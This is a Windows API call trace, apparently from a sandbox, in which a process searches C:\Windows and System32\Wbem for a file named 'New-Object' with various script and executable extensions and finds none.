	[0046.535] GetFullPathNameW (in: lpFileName="New-Object.CMD", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.CMD", lpFilePart=0x0) returned 0x28
	[0046.535] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.CMD", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.535] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.535] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.535] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.535] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.535] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.VBS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.VBS", lpFilePart=0x0) returned 0x19
	[0046.536] GetFullPathNameW (in: lpFileName="New-Object.VBS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.VBS", lpFilePart=0x0) returned 0x28
	[0046.536] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.VBS", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.536] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.536] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.536] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.536] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.536] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.VBE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.VBE", lpFilePart=0x0) returned 0x19
	[0046.536] GetFullPathNameW (in: lpFileName="New-Object.VBE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.VBE", lpFilePart=0x0) returned 0x28
	[0046.536] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.VBE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.537] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.537] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.537] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.JS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.JS", lpFilePart=0x0) returned 0x18
	[0046.537] GetFullPathNameW (in: lpFileName="New-Object.JS", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.JS", lpFilePart=0x0) returned 0x27
	[0046.537] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.JS", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.537] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.537] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.537] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.538] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.JSE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.JSE", lpFilePart=0x0) returned 0x19
	[0046.538] GetFullPathNameW (in: lpFileName="New-Object.JSE", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.JSE", lpFilePart=0x0) returned 0x28
	[0046.538] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.JSE", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.538] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.538] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.538] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.538] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.538] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.538] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.WSF", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.WSF", lpFilePart=0x0) returned 0x19
	[0046.539] GetFullPathNameW (in: lpFileName="New-Object.WSF", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.WSF", lpFilePart=0x0) returned 0x28
	[0046.539] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.WSF", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.539] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.539] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.539] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.539] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.WSH", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.WSH", lpFilePart=0x0) returned 0x19
	[0046.539] GetFullPathNameW (in: lpFileName="New-Object.WSH", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.WSH", lpFilePart=0x0) returned 0x28
	[0046.539] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.WSH", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.539] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.540] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.540] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.MSC", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.MSC", lpFilePart=0x0) returned 0x19
	[0046.540] GetFullPathNameW (in: lpFileName="New-Object.MSC", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.MSC", lpFilePart=0x0) returned 0x28
	[0046.540] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.MSC", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.540] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.540] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.540] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.540] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object.CPL", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object.CPL", lpFilePart=0x0) returned 0x19
	[0046.540] GetFullPathNameW (in: lpFileName="New-Object.CPL", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.CPL", lpFilePart=0x0) returned 0x28
	[0046.541] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object.CPL", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.541] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.541] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xc3771738, ftLastAccessTime.dwHighDateTime=0x1d3440d, ftLastWriteTime.dwLowDateTime=0xc3771738, ftLastWriteTime.dwHighDateTime=0x1d3440d, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1
	[0046.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.541] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0046.541] GetFullPathNameW (in: lpFileName="C:\\Windows\\New-Object", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\New-Object", lpFilePart=0x0) returned 0x15
	[0046.541] GetFullPathNameW (in: lpFileName="New-Object", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object", lpFilePart=0x0) returned 0x24
	[0046.541] FindFirstFileW (in: lpFileName="C:\\Windows\\New-Object", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.542] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.ps1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.ps1", lpFilePart=0x0) returned 0x27
	[0046.545] GetFullPathNameW (in: lpFileName="New-Object.ps1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.ps1", lpFilePart=0x0) returned 0x28
	[0046.545] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.ps1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.545] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.545] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.545] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.545] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.psm1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.psm1", lpFilePart=0x0) returned 0x28
	[0046.546] GetFullPathNameW (in: lpFileName="New-Object.psm1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.psm1", lpFilePart=0x0) returned 0x29
	[0046.546] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.psm1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18dee0) returned 1
	[0046.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18def0) returned 1
	[0046.546] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.546] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18deb0) returned 1
	[0046.546] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18df20) returned 1
	[0046.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.546] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.psd1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.psd1", lpFilePart=0x0) returned 0x28
	[0046.547] GetFullPathNameW (in: lpFileName="New-Object.psd1", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.psd1", lpFilePart=0x0) returned 0x29
	[0046.547] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.psd1", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
	[0046.547] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18df40) returned 1
	[0046.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18dab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.547] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x184c18dfd0 | out: lpFileInformation=0x184c18dfd0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12d5ce6, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x2b7f3fcc, ftLastAccessTime.dwHighDateTime=0x1d31d78, ftLastWriteTime.dwLowDateTime=0x2b7f3fcc, ftLastWriteTime.dwHighDateTime=0x1d31d78, nFileSizeHigh=0x0, nFileSizeLow=0x14000)) returned 1
	[0046.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x184c18da10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0046.547] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.COM", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\New-Object.COM", lpFilePart=0x0) returned 0x27
	[0046.547] GetFullPathNameW (in: lpFileName="New-Object.COM", nBufferLength=0x105, lpBuffer=0x184c18d9b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop\\New-Object.COM", lpFilePart=0x0) returned 0x28
	[0046.547] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\New-Object.COM", lpFindFileData=0x184c18dbc0 | out: lpFindFileData=0x184c18dbc0) returned 0xffffffffffffffff
